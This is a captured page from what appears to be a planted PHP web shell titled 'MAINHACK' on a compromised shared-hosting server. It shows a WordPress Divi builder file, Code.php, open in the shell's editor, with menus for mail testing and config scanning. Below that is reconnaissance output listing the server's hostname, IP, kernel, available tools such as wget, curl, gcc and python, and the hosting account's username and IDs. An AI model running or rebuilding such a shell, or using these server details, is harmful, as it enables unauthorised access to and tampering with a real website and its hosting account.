[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: Code.php
<?php class ET_Builder_Module_Code extends ET_Builder_Module { function init() { $this->name = esc_html__( 'Code', 'et_builder' ); $this->plural = esc_html__( 'Codes', 'et_builder' ); $this->slug = 'et_pb_code'; $this->vb_support = 'on'; $this->use_raw_content = true; $this->settings_modal_toggles = array( 'general' => array( 'toggles' => array( 'main_content' => esc_html__( 'Text', 'et_builder' ), ), ), 'advanced' => array( 'toggles' => array( 'width' => array( 'title' => esc_html__( 'Sizing', 'et_builder' ), 'priority' => 65, ), ), ), ); $this->advanced_fields = array( 'borders' => array( 'default' => false, ), 'margin_padding' => array( 'css' => array( 'important' => array( 'custom_margin' ), // needed to overwrite last module margin-bottom styling ), ), 'text_shadow' => array( // Don't add text-shadow fields since they already are via font-options 'default' => false, ), 'box_shadow' => array( 'default' => false, ), 'fonts' => false, 'button' => false, ); $this->help_videos = array( array( 'id' => esc_html( 'dTY6-Cbr00A' ), 'name' => esc_html__( 'An introduction to the Code module', 'et_builder' ), ), ); // wptexturize is often incorrectly parsed single and double quotes // This disables wptexturize on this module add_filter( 'no_texturize_shortcodes', array( $this, 'disable_wptexturize' ) ); } function get_fields() { $fields = array( 'raw_content' => array( 'label' => esc_html__( 'Content', 'et_builder' ), 'type' => 'codemirror', 'mode' => 'html', 'option_category' => 'basic_option', 'description' => esc_html__( 'Here you can create the content that will be used within the module.', 'et_builder' ), 'is_fb_content' => true, 'toggle_slug' => 'main_content', ), ); return $fields; } function render( $attrs, $content = null, $render_slug ) { $video_background = $this->video_background(); $parallax_image_background = $this->get_parallax_image_background(); // Module classnames $this->add_classname( $this->get_text_orientation_classname() ); $output = sprintf( '<div%2$s class="%3$s"> %5$s %4$s <div class="et_pb_code_inner"> %1$s </div> <!-- .et_pb_code_inner --> </div> <!-- .et_pb_code -->', $this->fix_wptexturized_scripts( $this->content ), $this->module_id(), $this->module_classname( $render_slug ), $video_background, $parallax_image_background ); return $output; } } new ET_Builder_Module_Code;
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium56.web-hosting.com
Server IP: 198.54.119.70
PHP Version: 8.2.30
Server Software: LiteSpeed
System: Linux premium56.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 70.22 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: bkunreyz
User ID (UID): 830
Group ID (GID): 826
Script Owner UID: 830
Current Dir Owner: 830